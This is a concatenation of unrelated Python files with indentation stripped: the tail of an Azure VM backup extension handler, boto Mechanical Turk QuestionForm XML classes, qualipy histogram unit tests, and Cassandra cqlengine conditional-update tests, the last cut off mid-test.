hutil.SetExtErrorCode(ExtensionErrorCodeHelper.ExtensionErrorCodeEnum.error)
error_msg= 'Failing backup as OnAppFailureDoFsFreeze is set to false'
temp_result=CommonVariables.error
temp_status= 'error'
exit_with_commit_log(temp_status, temp_result,error_msg, para_parser)
elif len(workload_patch.error_details) == 0 and OnAppSuccessDoFsFreeze == False: # App only
g_fsfreeze_on = False
elif len(workload_patch.error_details) == 0 and OnAppSuccessDoFsFreeze == True: #App&FS consistency
g_fsfreeze_on = True
else:
g_fsfreeze_on = True
freeze_snapshot(thread_timeout)
if pre_skipped == False:
workload_patch.post()
workload_error = workload_patch.populateErrors()
if workload_error != None and g_fsfreeze_on == False:
run_status = 'error'
run_result = workload_error.errorCode
hutil.SetExtErrorCode(workload_error.errorCode)
error_msg = 'Workload Patch failed with error message: ' + workload_error.errorMsg
error_msg = error_msg + ExtensionErrorCodeHelper.ExtensionErrorCodeHelper.StatusCodeStringBuilder(hutil.ExtErrorCode)
backup_logger.log(error_msg, True)
elif workload_error != None and g_fsfreeze_on == True:
hutil.SetExtErrorCode(workload_error.errorCode)
error_msg = 'Workload Patch failed with warning message: ' + workload_error.errorMsg
error_msg = error_msg + ExtensionErrorCodeHelper.ExtensionErrorCodeHelper.StatusCodeStringBuilder(hutil.ExtErrorCode)
backup_logger.log(error_msg, True)
else:
if(run_status == CommonVariables.status_success):
run_status = 'success'
run_result = CommonVariables.success_appconsistent
hutil.SetExtErrorCode(ExtensionErrorCodeHelper.ExtensionErrorCodeEnum.success_appconsistent)
error_msg = 'Enable Succeeded with App Consistent Snapshot'
backup_logger.log(error_msg, True)
else:
error_msg = 'Enable failed in fsfreeze snapshot flow'
backup_logger.log(error_msg, True)
else:
PluginHostObj = PluginHost(logger=backup_logger)
PluginHostErrorCode,dobackup,g_fsfreeze_on = PluginHostObj.pre_check()
doFsConsistentbackup = False
appconsistentBackup = False
if not (PluginHostErrorCode == CommonVariables.FailedPrepostPluginhostConfigParsing or
PluginHostErrorCode == CommonVariables.FailedPrepostPluginConfigParsing or
PluginHostErrorCode == CommonVariables.FailedPrepostPluginhostConfigNotFound or
PluginHostErrorCode == CommonVariables.FailedPrepostPluginhostConfigPermissionError or
PluginHostErrorCode == CommonVariables.FailedPrepostPluginConfigNotFound):
backup_logger.log('App Consistent Consistent Backup Enabled', True)
HandlerUtil.HandlerUtility.add_to_telemetery_data("isPrePostEnabled", "true")
appconsistentBackup = True
if(PluginHostErrorCode != CommonVariables.PrePost_PluginStatus_Success):
backup_logger.log('Triggering File System Consistent Backup because of error code' + ExtensionErrorCodeHelper.ExtensionErrorCodeHelper.StatusCodeStringBuilder(PluginHostErrorCode), True)
doFsConsistentbackup = True
preResult = PluginHostResult()
postResult = PluginHostResult()
if not doFsConsistentbackup:
preResult = PluginHostObj.pre_script()
dobackup = preResult.continueBackup
if(g_fsfreeze_on == False and preResult.anyScriptFailed):
dobackup = False
if dobackup:
freeze_snapshot(thread_timeout)
if not doFsConsistentbackup:
postResult = PluginHostObj.post_script()
if not postResult.continueBackup:
dobackup = False
if(g_fsfreeze_on == False and postResult.anyScriptFailed):
dobackup = False
if not dobackup:
if run_result == CommonVariables.success and PluginHostErrorCode != CommonVariables.PrePost_PluginStatus_Success:
run_status = 'error'
run_result = PluginHostErrorCode
hutil.SetExtErrorCode(PluginHostErrorCode)
error_msg = 'Plugin Host Precheck Failed'
error_msg = error_msg + ExtensionErrorCodeHelper.ExtensionErrorCodeHelper.StatusCodeStringBuilder(hutil.ExtErrorCode)
backup_logger.log(error_msg, True)
if run_result == CommonVariables.success:
pre_plugin_errors = preResult.errors
for error in pre_plugin_errors:
if error.errorCode != CommonVariables.PrePost_PluginStatus_Success:
run_status = 'error'
run_result = error.errorCode
hutil.SetExtErrorCode(error.errorCode)
error_msg = 'PreScript failed for the plugin ' + error.pluginName
error_msg = error_msg + ExtensionErrorCodeHelper.ExtensionErrorCodeHelper.StatusCodeStringBuilder(hutil.ExtErrorCode)
backup_logger.log(error_msg, True)
break
if run_result == CommonVariables.success:
post_plugin_errors = postResult.errors
for error in post_plugin_errors:
if error.errorCode != CommonVariables.PrePost_PluginStatus_Success:
run_status = 'error'
run_result = error.errorCode
hutil.SetExtErrorCode(error.errorCode)
error_msg = 'PostScript failed for the plugin ' + error.pluginName
error_msg = error_msg + ExtensionErrorCodeHelper.ExtensionErrorCodeHelper.StatusCodeStringBuilder(hutil.ExtErrorCode)
backup_logger.log(error_msg, True)
break
if appconsistentBackup:
if(PluginHostErrorCode != CommonVariables.PrePost_PluginStatus_Success):
hutil.SetExtErrorCode(PluginHostErrorCode)
pre_plugin_errors = preResult.errors
for error in pre_plugin_errors:
if error.errorCode != CommonVariables.PrePost_PluginStatus_Success:
hutil.SetExtErrorCode(error.errorCode)
post_plugin_errors = postResult.errors
for error in post_plugin_errors:
if error.errorCode != CommonVariables.PrePost_PluginStatus_Success:
hutil.SetExtErrorCode(error.errorCode)
if run_result == CommonVariables.success and not doFsConsistentbackup and not (preResult.anyScriptFailed or postResult.anyScriptFailed):
run_status = 'success'
run_result = CommonVariables.success_appconsistent
hutil.SetExtErrorCode(ExtensionErrorCodeHelper.ExtensionErrorCodeEnum.success_appconsistent)
error_msg = 'Enable Succeeded with App Consistent Snapshot'
backup_logger.log(error_msg, True)
else:
run_status = 'error'
run_result = CommonVariables.error_parameter
hutil.SetExtErrorCode(ExtensionErrorCodeHelper.ExtensionErrorCodeEnum.error_parameter)
error_msg = 'command is not correct'
backup_logger.log(error_msg, True, 'Error')
except Exception as e:
hutil.update_settings_file()
errMsg = 'Failed to enable the extension with error: %s, stack trace: %s' % (str(e), traceback.format_exc())
backup_logger.log(errMsg, True, 'Error')
global_error_result = e
"""
we do the final report here to get rid of the complex logic to handle the logging when file system be freezed issue.
"""
try:
if(global_error_result is not None):
if(hasattr(global_error_result,'errno') and global_error_result.errno == 2):
run_result = CommonVariables.error_12
hutil.SetExtErrorCode(ExtensionErrorCodeHelper.ExtensionErrorCodeEnum.error_12)
elif(para_parser is None):
run_result = CommonVariables.error_parameter
hutil.SetExtErrorCode(ExtensionErrorCodeHelper.ExtensionErrorCodeEnum.error_parameter)
else:
run_result = CommonVariables.error
hutil.SetExtErrorCode(ExtensionErrorCodeHelper.ExtensionErrorCodeEnum.error)
run_status = 'error'
error_msg += ('Enable failed.' + str(global_error_result))
status_report_msg = None
hutil.SetExtErrorCode(run_result) #setting extension errorcode at the end if missed somewhere
HandlerUtil.HandlerUtility.add_to_telemetery_data("extErrorCode", str(ExtensionErrorCodeHelper.ExtensionErrorCodeHelper.ExtensionErrorCodeNameDict[hutil.ExtErrorCode]))
total_used_size = -1
blob_report_msg, file_report_msg = get_status_to_report(run_status,run_result,error_msg, snapshot_info_array)
if(hutil.is_status_file_exists()):
status_report_to_file(file_report_msg)
status_report_to_blob(blob_report_msg)
except Exception as e:
errMsg = 'Failed to log status in extension'
backup_logger.log(errMsg, True, 'Error')
if(para_parser is not None and para_parser.logsBlobUri is not None and para_parser.logsBlobUri != ""):
backup_logger.commit(para_parser.logsBlobUri)
else:
backup_logger.log("the logs blob uri is not there, so do not upload log.")
backup_logger.commit_to_local()
sys.exit(0)
def uninstall():
global configSeqNo
hutil.do_parse_context('Uninstall', configSeqNo)
hutil.do_exit(0,'Uninstall','success','0', 'Uninstall succeeded')
def disable():
global configSeqNo
hutil.do_parse_context('Disable', configSeqNo)
hutil.do_exit(0,'Disable','success','0', 'Disable Succeeded')
def update():
global configSeqNo
hutil.do_parse_context('Upadate', configSeqNo)
hutil.do_exit(0,'Update','success','0', 'Update Succeeded')
def enable():
global backup_logger,hutil,error_msg,para_parser,patch_class_name,orig_distro,configSeqNo
try:
hutil.do_parse_context('Enable', configSeqNo)
backup_logger.log('starting enable', True)
backup_logger.log("patch_class_name: "+str(patch_class_name)+" and orig_distro: "+str(orig_distro),True)
hutil.exit_if_same_seq()
hutil.save_seq()
protected_settings = hutil._context._config['runtimeSettings'][0]['handlerSettings'].get('protectedSettings', {})
public_settings = hutil._context._config['runtimeSettings'][0]['handlerSettings'].get('publicSettings')
para_parser = ParameterParser(protected_settings, public_settings, backup_logger)
if(para_parser.taskId is not None and para_parser.taskId != ""):
backup_logger.log('taskId: ' + str(para_parser.taskId), True)
randomSleepTime = random.randint(500, 5000)
backup_logger.log('Sleeping for milliseconds: ' + str(randomSleepTime), True)
time.sleep(randomSleepTime / 1000)
exit_if_same_taskId(para_parser.taskId)
taskIdentity = TaskIdentity()
taskIdentity.save_identity(para_parser.taskId)
temp_status= 'success'
temp_result=CommonVariables.ExtensionTempTerminalState
temp_msg='Transitioning state in extension'
blob_report_msg, file_report_msg = get_status_to_report(temp_status, temp_result, temp_msg, None)
status_report_to_file(file_report_msg)
start_daemon()
sys.exit(0)
except Exception as e:
hutil.update_settings_file()
errMsg = 'Failed to call the daemon with error: %s, stack trace: %s' % (str(e), traceback.format_exc())
global_error_result = e
temp_status= 'error'
temp_result=CommonVariables.error
hutil.SetExtErrorCode(ExtensionErrorCodeHelper.ExtensionErrorCodeEnum.error)
error_msg = 'Failed to call the daemon'
exit_with_commit_log(temp_status, temp_result,error_msg, para_parser)
def thread_for_log_upload():
global para_parser,backup_logger
backup_logger.commit(para_parser.logsBlobUri)
def start_daemon():
args = [os.path.join(os.getcwd(), "main/handle.sh"), "daemon"]
#This process will start a new background process by calling
# handle.py -daemon
#to run the script and will exit itself immediatelly.
#Redirect stdout and stderr to /dev/null. Otherwise daemon process will
#throw Broke pipe exeception when parent process exit.
devnull = open(os.devnull, 'w')
child = subprocess.Popen(args, stdout=devnull, stderr=devnull)
if __name__ == '__main__' :
main()
|
|
# Copyright (c) 2006,2007 Mitch Garnaat http://garnaat.org/
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
class Question:
QUESTION_XML_TEMPLATE = """<Question><QuestionIdentifier>%s</QuestionIdentifier>%s%s</Question>"""
def __init__(self, identifier, content, answer_spec): #amount=0.0, currency_code='USD'):
self.identifier = identifier
self.content = content
self.answer_spec = answer_spec
def get_as_params(self, label='Question', identifier=None):
if identifier is None:
raise ValueError("identifier (QuestionIdentifier) is required per MTurk spec.")
return { label : self.get_as_xml() }
def get_as_xml(self):
ret = Question.QUESTION_XML_TEMPLATE % (self.identifier, self.content.get_as_xml(), self.answer_spec.get_as_xml())
return ret
class QuestionForm:
QUESTIONFORM_SCHEMA_LOCATION = "http://mechanicalturk.amazonaws.com/AWSMechanicalTurkDataSchemas/2005-10-01/QuestionForm.xsd"
QUESTIONFORM_XML_TEMPLATE = """<QuestionForm xmlns="%s">%s</QuestionForm>""" # % (ns, questions_xml)
def __init__(self, questions=None):
if questions is None or type(questions) is not list:
raise ValueError("Must pass a list of Question instances to QuestionForm constructor")
else:
self.questions = questions
def get_as_xml(self):
questions_xml = "".join([q.get_as_xml() for q in self.questions])
return QuestionForm.QUESTIONFORM_XML_TEMPLATE % (QuestionForm.QUESTIONFORM_SCHEMA_LOCATION, questions_xml)
#def startElement(self, name, attrs, connection):
# return None
#
#def endElement(self, name, value, connection):
#
# #if name == 'Amount':
# # self.amount = float(value)
# #elif name == 'CurrencyCode':
# # self.currency_code = value
# #elif name == 'FormattedPrice':
# # self.formatted_price = value
#
# pass # What's this method for? I don't get it.
class QuestionContent:
def __init__(self, title=None, text=None, bulleted_list=None, binary=None, application=None, formatted_content=None):
self.title = title
self.text = text
self.bulleted_list = bulleted_list
self.binary = binary
self.application = application
self.formatted_content = formatted_content
def get_title_xml(self):
if self.title is None:
return '' # empty
else:
return "<Title>%s</Title>" % self.title
def get_text_xml(self):
if self.text is None:
return ''
else:
return "<Text>%s</Text>" % self.text
def get_bulleted_list_xml(self):
if self.bulleted_list is None:
return ''
elif type(self.bulleted_list) is list:
return "<List>%s</List>" % self.get_bulleted_list_items_xml()
else:
raise ValueError("QuestionContent bulleted_list argument should be a list.")
def get_bulleted_list_items_xml(self):
ret = ""
for item in self.bulleted_list:
ret = ret + "<ListItem>%s</ListItem>" % item
return ret
def get_binary_xml(self):
if self.binary is None:
return ''
else:
raise NotImplementedError("Binary question content is not yet supported.")
def get_application_xml(self):
if self.application is None:
return ''
else:
raise NotImplementedError("Application question content is not yet supported.")
def get_formatted_content_xml(self):
if self.formatted_content is None:
return ''
else:
return "<FormattedContent><![CDATA[%s]]></FormattedContent>" % self.formatted_content
def get_as_xml(self):
children = self.get_title_xml() + self.get_text_xml() + self.get_bulleted_list_xml() + self.get_binary_xml() + self.get_application_xml() + self.get_formatted_content_xml()
return "<QuestionContent>%s</QuestionContent>" % children
class AnswerSpecification:
ANSWERSPECIFICATION_XML_TEMPLATE = """<AnswerSpecification>%s</AnswerSpecification>"""
def __init__(self, spec):
self.spec = spec
def get_as_xml(self):
values = () # TODO
return AnswerSpecification.ANSWERSPECIFICATION_XML_TEMPLATE % self.spec.get_as_xml()
class FreeTextAnswer:
FREETEXTANSWER_XML_TEMPLATE = """<FreeTextAnswer>%s%s</FreeTextAnswer>""" # (constraints, default)
FREETEXTANSWER_CONSTRAINTS_XML_TEMPLATE = """<Constraints>%s%s</Constraints>""" # (is_numeric_xml, length_xml)
FREETEXTANSWER_LENGTH_XML_TEMPLATE = """<Length %s %s />""" # (min_length_attr, max_length_attr)
FREETEXTANSWER_ISNUMERIC_XML_TEMPLATE = """<IsNumeric %s %s />""" # (min_value_attr, max_value_attr)
FREETEXTANSWER_DEFAULTTEXT_XML_TEMPLATE = """<DefaultText>%s</DefaultText>""" # (default)
def __init__(self, default=None, min_length=None, max_length=None, is_numeric=False, min_value=None, max_value=None):
self.default = default
self.min_length = min_length
self.max_length = max_length
self.is_numeric = is_numeric
self.min_value = min_value
self.max_value = max_value
def get_as_xml(self):
is_numeric_xml = ""
if self.is_numeric:
min_value_attr = ""
max_value_attr = ""
if self.min_value:
min_value_attr = """minValue="%d" """ % self.min_value
if self.max_value:
max_value_attr = """maxValue="%d" """ % self.max_value
is_numeric_xml = FreeTextAnswer.FREETEXTANSWER_ISNUMERIC_XML_TEMPLATE % (min_value_attr, max_value_attr)
length_xml = ""
if self.min_length or self.max_length:
min_length_attr = ""
max_length_attr = ""
if self.min_length:
min_length_attr = """minLength="%d" """
if self.max_length:
max_length_attr = """maxLength="%d" """
length_xml = FreeTextAnswer.FREETEXTANSWER_LENGTH_XML_TEMPLATE % (min_length_attr, max_length_attr)
constraints_xml = ""
if is_numeric_xml != "" or length_xml != "":
constraints_xml = FreeTextAnswer.FREETEXTANSWER_CONSTRAINTS_XML_TEMPLATE % (is_numeric_xml, length_xml)
default_xml = ""
if self.default is not None:
default_xml = FreeTextAnswer.FREETEXTANSWER_DEFAULTTEXT_XML_TEMPLATE % self.default
return FreeTextAnswer.FREETEXTANSWER_XML_TEMPLATE % (constraints_xml, default_xml)
class FileUploadAnswer:
FILEUPLOADANSWER_XML_TEMLPATE = """<FileUploadAnswer><MinFileSizeInBytes>%d</MinFileSizeInBytes><MaxFileSizeInBytes>%d</MaxFileSizeInBytes></FileUploadAnswer>""" # (min, max)
DEFAULT_MIN_SIZE = 1024 # 1K (completely arbitrary!)
DEFAULT_MAX_SIZE = 5 * 1024 * 1024 # 5MB (completely arbitrary!)
def __init__(self, min=None, max=None):
self.min = min
self.max = max
if self.min is None:
self.min = FileUploadAnswer.DEFAULT_MIN_SIZE
if self.max is None:
self.max = FileUploadAnswer.DEFAULT_MAX_SIZE
def get_as_xml(self):
return FileUploadAnswer.FILEUPLOADANSWER_XML_TEMLPATE % (self.min, self.max)
class SelectionAnswer:
"""
A class to generate SelectionAnswer XML data structures.
Does not yet implement Binary selection options.
"""
SELECTIONANSWER_XML_TEMPLATE = """<SelectionAnswer>%s<Selections>%s</Selections></SelectionAnswer>""" # % (style_xml, selections_xml)
SELECTION_XML_TEMPLATE = """<Selection><SelectionIdentifier>%s</SelectionIdentifier>%s</Selection>""" # (identifier, value_xml)
SELECTION_VALUE_XML_TEMPLATE = """<%s>%s</%s>""" # (type, value, type)
STYLE_XML_TEMPLATE = """<StyleSuggestion>%s</StyleSuggestion>""" # (style)
ACCEPTED_STYLES = ['radiobutton', 'dropdown', 'checkbox', 'list', 'combobox', 'multichooser']
def __init__(self, min=1, max=1, style=None, selections=None, type='text', other=False):
if style is not None:
if style in SelectionAnswer.ACCEPTED_STYLES:
self.style_suggestion = style
else:
raise ValueError("style '%s' not recognized; should be one of %s" % (style, ', '.join(SelectionAnswer.ACCEPTED_STYLES)))
else:
self.style_suggestion = None
if selections is None:
raise ValueError("SelectionAnswer.__init__(): selections must be a non-empty list of tuples")
else:
self.selections = selections
self.min_selections = min
self.max_selections = max
assert len(selections) >= self.min_selections, "# of selections is less than minimum of %d" % self.min_selections
#assert len(selections) <= self.max_selections, "# of selections exceeds maximum of %d" % self.max_selections
self.type = type
self.other = other
def get_as_xml(self):
xml = ""
if self.type == 'text':
TYPE_TAG = "Text"
elif self.type == 'binary':
TYPE_TAG = "Binary"
else:
raise ValueError("illegal type: %s; must be either 'text' or 'binary'" % str(self.type))
# build list of <Selection> elements
selections_xml = ""
for tpl in self.selections:
value_xml = SelectionAnswer.SELECTION_VALUE_XML_TEMPLATE % (TYPE_TAG, tpl[0], TYPE_TAG)
selection_xml = SelectionAnswer.SELECTION_XML_TEMPLATE % (tpl[1], value_xml)
selections_xml += selection_xml
if self.other:
# add <OtherSelection> element
selections_xml += "<OtherSelection />"
if self.style_suggestion is not None:
style_xml = SelectionAnswer.STYLE_XML_TEMPLATE % self.style_suggestion
else:
style_xml = ""
ret = SelectionAnswer.SELECTIONANSWER_XML_TEMPLATE % (style_xml, selections_xml)
# return XML
return ret
|
|
import numpy
from qualipy.utils.histogram_analyzation import *
def arrayNpEquals(arr1, arr2):
if arr1.shape[0] != arr2.shape[0]:
return False
comp = arr1 == arr2
for i in range(0, comp.shape[0]):
if comp[i] != True:
return False
return True
def arrayEquals(arr1, arr2):
if len(arr1) != len(arr2):
return False
comp = arr1 == arr2
if type(comp) == bool:
return comp
for i in range(0, len(comp)):
if comp[i] != True:
return False
return True
def test_remove_from_ends_with_valid_histogram():
hist = numpy.array([1, 1, 0, 0, 0, 1, 1])
assert len(remove_from_ends(hist).nonzero()[0]) == 0
def test_remove_from_ends_with_invalid_histogram():
hist = numpy.array([1.0])
assert arrayNpEquals(remove_from_ends(hist), hist)
def test_normalize_with_valid_histogram():
hist = numpy.array([1, 2, 3, 2, 1])
assert numpy.absolute(numpy.sum(normalize(hist)) - 1.0) < 0.00000001
def test_normalize_with_invalid_histogram():
hist = numpy.array([])
assert arrayNpEquals(normalize(hist), hist)
def test_calculate_continuous_distribution_with_valid_histogram():
hist = numpy.array([1.0, 2.0, 3.0, 4.0])
assert arrayNpEquals(calculate_continuous_distribution(hist),
numpy.array([1.0, 3.0, 6.0, 10.0]))
def test_continuous_distribution_with_invalid_histogram():
hist = numpy.array([])
assert arrayNpEquals(calculate_continuous_distribution(hist), hist)
def test_largest_with_valid_histogram():
hist = numpy.array([2.0, 4.0, 1.0, 3.0])
assert arrayNpEquals(largest(hist, 0.5), numpy.array([4.0, 3.0]))
def test_largest_with_invalid_histogram():
hist = numpy.array([])
assert arrayNpEquals(largest(hist, 0.5), numpy.array([]))
def test_calculate_derivatives_with_valid_histogram():
hist = numpy.array([1, 2, 4, 2, 1])
assert arrayNpEquals(calculate_derivatives(hist),
numpy.array([1.0, 2.0, -2.0, -1.0]))
def test_calculate_derivatives_with_invalid_histogram():
hist = numpy.array([])
assert arrayNpEquals(calculate_derivatives(hist), numpy.array([]))
def test_calculate_local_min_values_with_valid_histogram():
hist = numpy.array([2.0, 1.0, 2.0, 4.0, 3.0, 2.0, 3.0])
assert calculate_local_min_values(hist, 2) == \
[LocationData(1, 1.0), LocationData(5, 2.0)]
def test_calculate_local_min_values_with_invalid_histogram():
hist = numpy.array([])
assert arrayEquals(calculate_local_min_values(hist, 2), [])
def test_calculate_local_max_values_with_valid_histogram():
hist = numpy.array([2.0, 1.0, 2.0, 4.0, 3.0, 2.0, 3.0])
assert calculate_local_max_values(hist) == [LocationData(3, 4.0)]
def test_calculate_local_max_values_with_invalid_histogram():
hist = numpy.array([])
assert arrayEquals(calculate_local_max_values(hist, 2), [])
def test_calculate_local_minimums_with_valid_histogram():
hist = numpy.array([2.0, 1.0, 2.0, 4.0, 3.0, 2.0, 3.0])
mins = calculate_local_minimums(hist)
assert len(mins) == 2
assert mins[0].index == 1 and mins[0].value == 1.0
assert mins[1].index == 5 and mins[1].value == 2.0
def test_calculate_local_minimums_with_invalid_histogram():
hist = numpy.array([])
assert arrayEquals(calculate_local_minimums(hist), [])
def test_calculate_local_maximums_with_valid_histogram():
hist = numpy.array([2.0, 1.0, 2.0, 4.0, 3.0, 2.0, 3.0])
maxs = calculate_local_maximums(hist)
assert len(maxs) == 1
assert maxs[0].index == 3 and maxs[0].value == 4.0
def test_calculate_local_maximums_with_invalid_histogram():
hist = numpy.array([])
assert arrayEquals(calculate_local_maximums(hist), [])
def test_calc_mean_with_valid_histogram():
hist = numpy.array([1.0, 2.0, 3.0, 2.0, 1.0])
assert calc_mean(hist) == 3.0
def test_calc_mean_with_invalid_histogram():
hist = numpy.array([])
hist_2 = numpy.array([1.0, -1.0])
assert calc_mean(hist) == 0.0
assert calc_mean(hist_2) == 0.0
def test_variance_with_valid_histogram():
hist = numpy.array([1.0, 2.0, 3.0, 2.0, 3.0])
mean = calc_mean(hist)
assert numpy.absolute(calc_variance(hist, mean) - 2.686) < 0.01
def test_variance_with_invalid_histogram():
hist = numpy.array([])
hist_2 = numpy.array([1.0, -1.0])
mean = calc_mean(hist)
mean_2 = calc_mean(hist_2)
assert calc_variance(hist, mean) == 0.0
assert calc_variance(hist_2, mean_2) == 0.0
def test_standard_deviation_with_valid_histogram():
hist = numpy.array([1.0, 2.0, 3.0, 2.0, 3.0])
assert numpy.absolute(calc_standard_deviation(hist) - 1.639) < 0.01
def test_standard_deviation_with_invalid_histogram():
hist = numpy.array([])
hist_2 = numpy.array([1.0, -1.0])
assert calc_standard_deviation(hist) == 0.0
assert calc_standard_deviation(hist_2) == 0.0
def test_roughness_with_valid_histogram():
hist = numpy.array([0.0, 0.5, 1.0, 0.5, 2.0, 0.5, 0.0])
assert calculate_roughness(hist) == 2.0
def test_roughness_with_empty_histogram():
hist = numpy.array([])
assert calculate_roughness(hist) == 0.0
def test_calculate_peak_value_with_valid_histogram():
hist = numpy.array([0.0, 0.5, 1.0, 0.5, 2.0, 0.5, 0.0, 2.0])
assert arrayNpEquals(calculate_peak_value(hist),
numpy.array([-1.0]).astype(numpy.float32))
def test_calculate_peak_value_with_invalid_histogram():
hist = numpy.array([])
assert arrayNpEquals(calculate_peak_value(hist), numpy.array([]))
|
|
# Copyright 2013-2016 DataStax, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
try:
import unittest2 as unittest
except ImportError:
import unittest # noqa
import mock
import six
from uuid import uuid4
from cassandra.cqlengine import columns
from cassandra.cqlengine.management import sync_table, drop_table
from cassandra.cqlengine.models import Model
from cassandra.cqlengine.query import BatchQuery, LWTException
from cassandra.cqlengine.statements import ConditionalClause
from tests.integration.cqlengine.base import BaseCassEngTestCase
from tests.integration import CASSANDRA_VERSION, greaterthancass20
class TestConditionalModel(Model):
id = columns.UUID(primary_key=True, default=uuid4)
count = columns.Integer()
text = columns.Text(required=False)
@unittest.skipUnless(CASSANDRA_VERSION >= '2.0.0', "conditionals only supported on cassandra 2.0 or higher")
class TestConditional(BaseCassEngTestCase):
@classmethod
def setUpClass(cls):
super(TestConditional, cls).setUpClass()
sync_table(TestConditionalModel)
@classmethod
def tearDownClass(cls):
super(TestConditional, cls).tearDownClass()
drop_table(TestConditionalModel)
def test_update_using_conditional(self):
t = TestConditionalModel.create(text='blah blah')
t.text = 'new blah'
with mock.patch.object(self.session, 'execute') as m:
t.iff(text='blah blah').save()
args = m.call_args
self.assertIn('IF "text" = %(0)s', args[0][0].query_string)
def test_update_conditional_success(self):
t = TestConditionalModel.create(text='blah blah', count=5)
id = t.id
t.text = 'new blah'
t.iff(text='blah blah').save()
updated = TestConditionalModel.objects(id=id).first()
self.assertEqual(updated.count, 5)
self.assertEqual(updated.text, 'new blah')
def test_update_failure(self):
t = TestConditionalModel.create(text='blah blah')
t.text = 'new blah'
t = t.iff(text='something wrong')
with self.assertRaises(LWTException) as assertion:
t.save()
self.assertEqual(assertion.exception.existing, {
'text': 'blah blah',
'[applied]': False,
})
def test_blind_update(self):
t = TestConditionalModel.create(text='blah blah')
t.text = 'something else'
uid = t.id
with mock.patch.object(self.session, 'execute') as m:
TestConditionalModel.objects(id=uid).iff(text='blah blah').update(text='oh hey der')
args = m.call_args
self.assertIn('IF "text" = %(1)s', args[0][0].query_string)
def test_blind_update_fail(self):
t = TestConditionalModel.create(text='blah blah')
t.text = 'something else'
uid = t.id
qs = TestConditionalModel.objects(id=uid).iff(text='Not dis!')
with self.assertRaises(LWTException) as assertion:
qs.update(text='this will never work')
self.assertEqual(assertion.exception.existing, {
'text': 'blah blah',
'[applied]': False,
})
def test_conditional_clause(self):
tc = ConditionalClause('some_value', 23)
tc.set_context_id(3)
self.assertEqual('"some_value" = %(3)s', six.text_type(tc))
self.assertEqual('"some_value" = %(3)s', str(tc))
def test_batch_update_conditional(self):
t = TestConditionalModel.create(text='something', count=5)
id = t.id
with BatchQuery() as b:
t.batch(b).iff(count=5).update(text='something else')
updated = TestConditionalModel.objects(id=id).first()
self.assertEqual(updated.text, 'something else')
b = BatchQuery()
updated.batch(b).iff(count=6).update(text='and another thing')
with self.assertRaises(LWTException) as assertion:
b.execute()
self.assertEqual(assertion.exception.existing, {
'id': id,
'count': 5,
'[applied]': False,
})
updated = TestConditionalModel.objects(id=id).first()
self.assertEqual(updated.text, 'something else')
def test_delete_conditional(self):
# DML path
t = TestConditionalModel.create(text='something', count=5)
self.assertEqual(TestConditionalModel.objects(id=t.id).count(), 1)
with self.assertRaises(LWTException):
t.iff(count=9999).delete()
self.assertEqual(TestConditionalModel.objects(id=t.id).count(), 1)
t.iff(count=5).delete()
self.assertEqual(TestConditionalModel.objects(id=t.id).count(), 0)
# QuerySet path
t = TestConditionalModel.create(text='something', count=5)
self.assertEqual(TestConditionalModel.objects(id=t.id).count(), 1)
with self.assertRaises(LWTException):
TestConditionalModel.objects(id=t.id).iff(count=9999).delete()
self.assertEqual(TestConditionalModel.objects(id=t.id).count(), 1)
TestConditionalModel.objects(id=t.id).iff(count=5).delete()
self.assertEqual(TestConditionalModel.objects(id=t.id).count(), 0)
@greaterthancass20
def test_delete_lwt_ne(self):
"""
Test to ensure that deletes using IF and not equals are honored correctly
@since 3.2
@jira_ticket PYTHON-328
@expected_result Delete conditional with NE should be honored
@test_category object_mapper
"""
# DML path
t = TestConditionalModel.create(text='something', count=5)
self.assertEqual(TestConditionalModel.objects(id=t.id).count(), 1)
with self.assertRaises(LWTException):
t.iff(count__ne=5).delete()
t.iff(count__ne=2).delete()
self.assertEqual(TestConditionalModel.objects(id=t.id).count(), 0)
# QuerySet path
t = TestConditionalModel.create(text='something', count=5)
self.assertEqual(TestConditionalModel.objects(id=t.id).count(), 1)
with self.assertRaises(LWTException):
TestConditionalModel.objects(id=t.id).iff(count__ne=5).delete()
TestConditionalModel.objects(id=t.id).iff(count__ne=2).delete()
self.assertEqual(TestConditionalModel.objects(id=t.id).count(), 0)
@greaterthancass20
def test_update_lwt_ne(self):
"""
Test to ensure that update using IF and not equals are honored correctly
@since 3.2
@jira_ticket PYTHON-328
@expected_result update conditional with NE should be honored
@test_category object_mapper
"""
# DML path
t = TestConditionalModel.create(text='something', count=5)
self.assertEqual(TestConditionalModel.objects(id=t.id).count(), 1)
with self.assertRaises(LWTException):
t.iff(count__ne=5).update(text='nothing')
t.iff(count__ne=2).update(text='nothing')
self.assertEqual(TestConditionalModel.objects(id=t.id).first().text, 'nothing')
t.delete()
# QuerySet path
t = TestConditionalModel.create(text='something', count=5)
self.assertEqual(TestConditionalModel.objects(id=t.id).count(), 1)
with self.assertRaises(LWTException):
TestConditionalModel.objects(id=t.id).iff(count__ne=5).update(text='nothing')
TestConditionalModel.objects(id=t.id).iff(count__ne=2).update(text='nothing')
self.assertEqual(TestConditionalModel.objects(id=t.id).first().text, 'nothing')
t.delete()
def test_update_to_none(self):
# This test is done because updates to none are split into deletes
# for old versions of cassandra. Can be removed when we drop that code
# https://github.com/datastax/python-driver/blob/3.1.1/cassandra/cqlengine/query.py#L1197-L1200
# DML path
